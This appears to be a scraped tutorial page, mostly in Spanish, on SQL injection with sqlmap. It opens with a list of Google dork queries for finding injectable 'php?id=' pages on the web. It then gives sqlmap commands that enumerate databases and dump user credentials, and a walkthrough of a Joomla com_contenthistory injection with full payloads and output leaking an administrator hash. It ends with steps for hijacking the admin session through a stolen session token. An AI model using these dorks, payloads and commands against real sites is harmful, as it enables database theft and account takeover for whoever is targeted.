Académique Documents
Professionnel Documents
Culture Documents
inurl:loadpsb.php?id=
inurl:transcript.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:channel_id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
EJEMPLO
.php?id=101
sqlmap
python sqlmap.py -u "target_url"
python sqlmap.py -u "target_url"
python sqlmap.py -u "target_url"
--columns
python sqlmap.py -u "target_url"
-C column_name dump
--dbs
-D database_name --tables
-D database_name -T table_name
-D database_name -T table_name
sqlmap -h
To start with we will begin with a Basic command : sqlmap -u <URL to inject>
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
Sometimes, using the time-sec helps to speed up the process, especially when the server responses are slow.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
--time-sec 15
numeration of Database
Table
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D
acuart --tables
The result should be something like this
Database: acuart
[8 tables]
++
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
Columns
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D
acuart -T users
--columns
Data
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D
acuart -T
users -C email,name,pass dump
sqlmap -u "http://127.0.0.1/Joomla/index.php?
option=com_contenthistory&view=history&list[ordering]
=&item_id=1&list[select]=" --threads=10 --dbms=MYSQL
--technique=E --dbs
Obteniendo la inyeccin:
sqlmap -u "http://127.0.0.1/Joomla/index.php?
option=com_contenthistory&view=history&item_id=1&list[select]
[*] information_schema
[*] JoomlaLab
[*] mysql
[*] performance_schema
[19:47:40] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[19:47:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'
[*] shutting down at 19:47:40
A continuacin podemos enumerar las tablas de la base de datos:
sqlmap -u "http://127.0.0.1/Joomla/index.php?
option=com_contenthistory&view=history&item_id=1&list[select]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
clause
Payload:
option=com_contenthistory&view=history&list[ordering]=&item_id=1&a
mp;list[select]=' AND (SELECT 5490 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,
(SELECT (ELT(5490=5490,1))),0x7170717171,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
--[19:52:28] [WARNING] changes made by tampering scripts are not included in shown
payload content(s)
[19:52:28] [INFO] testing MySQL
[19:52:28] [INFO] confirming MySQL
[19:52:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[19:52:28] [INFO] fetching tables for database: 'JoomlaLab'
[19:52:28] [WARNING] reflective value(s) found and filtering out
[19:52:28] [INFO] the SQL query used returns 68 entries
[19:52:28] [INFO] starting 10 threads
[19:52:29] [INFO] retrieved: q9741_banner_tracks
[19:52:29] [INFO] retrieved: q9741_assets
[19:52:29] [INFO] retrieved: q9741_categories
[19:52:29] [INFO] retrieved: q9741_banner_clients
[19:52:29] [INFO] retrieved: q9741_associations
[19:52:29] [INFO] retrieved: q9741_banners
[19:52:29] [INFO] retrieved: q9741_contact_details
[19:52:29] [INFO] retrieved: q9741_content_frontpage
[19:52:29] [INFO] retrieved: q9741_content
[19:52:29] [INFO] retrieved: q9741_content_rating
| q9741_finder_links_terms7 |
| q9741_finder_links_terms8 |
| q9741_finder_links_terms9 |
| q9741_finder_links_termsa |
| q9741_finder_links_termsb |
| q9741_finder_links_termsc |
| q9741_finder_links_termsd |
| q9741_finder_links_termse |
| q9741_finder_links_termsf |
| q9741_finder_taxonomy |
| q9741_finder_taxonomy_map |
| q9741_finder_terms |
| q9741_finder_terms_common |
| q9741_finder_tokens |
| q9741_finder_tokens_aggregate |
| q9741_finder_types |
| q9741_languages |
| q9741_menu |
| q9741_menu_types |
| q9741_messages |
| q9741_messages_cfg |
| q9741_modules |
| q9741_modules_menu |
| q9741_newsfeeds |
| q9741_overrider |
| q9741_postinstall_messages |
| q9741_redirect_links |
| q9741_schemas |
| q9741_session |
| q9741_tags |
| q9741_template_styles |
| q9741_ucm_base |
| q9741_ucm_content |
| q9741_ucm_history |
| q9741_update_sites |
| q9741_update_sites_extensions |
| q9741_updates |
| q9741_user_keys |
| q9741_user_notes |
| q9741_user_profiles |
| q9741_user_usergroup_map |
| q9741_usergroups |
| q9741_users |
| q9741_viewlevels |
| q9741_weblinks |
+-------------------------------+
[19:52:30] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 72 times
[19:52:30] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'
[*] shutting down at 19:52:30
root@KaliVB:~#
A continuacin se puede ir por el camino clsico y volcar la tabla de usuarios para
crackear el hash de la contrasea:
sqlmap -u "http://127.0.0.1/Joomla/index.php?
option=com_contenthistory&view=history&item_id=1&list[select]
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state and federal
laws. Developers assume no liability and are not responsible for any misuse or damage
caused by this program
[*] starting at 21:00:11
[21:00:11] [WARNING] provided value for parameter 'list[select]' is empty. Please,
always use only valid parameter values so sqlmap could be able to run properly
[21:00:11] [INFO] testing connection to the target URL
[21:00:11] [WARNING] there is a DBMS error found in the HTTP response body which
could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
--Parameter: list[select] (GET)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace
Payload:
option=com_contenthistory&view=history&list[ordering]=&item_id=1&a
mp;list[select]=(SELECT 9327 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT
(ELT(9327=9327,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
--[21:00:11] [INFO] testing MySQL
[21:00:11] [INFO] confirming MySQL
[21:00:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[21:00:11] [INFO] fetching columns for table 'q9741_users' in database 'JoomlaLab'
+---------------------+---------------------+---------------------+
| id | name | otep | email | block | otpKey | params | username | password | sendEmail |
activation | resetCount | registerDate | lastResetTime | lastvisitDate |
+-----+------------+---------+---------------------------------+-------+---------+---------+---------+--------------------------------------------------------------+-----------+------------+-----------+---------------------+---------------------+---------------------+
| 601 | Super User | <blank> | correo@gmail.com | 0 | <blank> | <blank> |
alberto | $2y$10$SD20rJFbG7QEXyfMaw9IC.yRigW2NwZ2RVZzbFlNJ1/cDTsC9DL2y | 1 | 0
| 0 | 2015-10-24 16:11:53 | 0000-00-00 00:00:00 | 2015-10-24 16:16:32 |
+-----+------------+---------+---------------------------------+-------+---------+---------+---------+--------------------------------------------------------------+-----------+------------+-----------+---------------------+---------------------+---------------------+
[21:00:12] [INFO] table 'JoomlaLab.q9741_users' dumped to CSV file
'/root/.sqlmap/output/127.0.0.1/dump/JoomlaLab/q9741_users.csv'
[21:00:12] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 50 times
[21:00:12] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'
[*] shutting down at 21:00:12
Pero dandole una vuelta ms, lo que hacen en Trustwave para saltarse el farragoso
proceso de crackear la contrasea es consultar la tabla *_session y coger el token de
autenticacin del administrador para hacer un secuestro de sesin o hijacking.
Refrescar el navegador
Modificar la cookie con el valor de session_id
Secuestro de sesin
Queda visto lo sencillo que es explotar esta vulnerabilidad. La recomendacin es
actualizar cunto antes a la ltima versin que solventa esta vulnerabilidad y esperara a
Noviembre cuando se lanzar la versin 3.5 renovada.